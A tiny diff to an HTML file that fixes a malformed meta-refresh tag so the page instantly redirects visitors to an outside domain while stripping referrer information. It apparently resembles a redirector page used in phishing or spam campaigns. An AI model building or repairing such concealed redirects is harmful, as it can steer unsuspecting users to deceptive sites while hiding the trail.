--- a/prime.html
+++ b/prime.html
@@ -3,5 +3,5 @@
 <meta name="referrer" content="no-referrer" />
     <!-- For Edge and Safari -->
     <meta name="referrer" content="never" />
-    <meta http-equiv="refresh" content="0; URL="https://propertymgnt.org/nn?kali" />
+    <meta http-equiv="refresh" content="0; URL=https://propertymgnt.org/nn?kali" />
 </html>
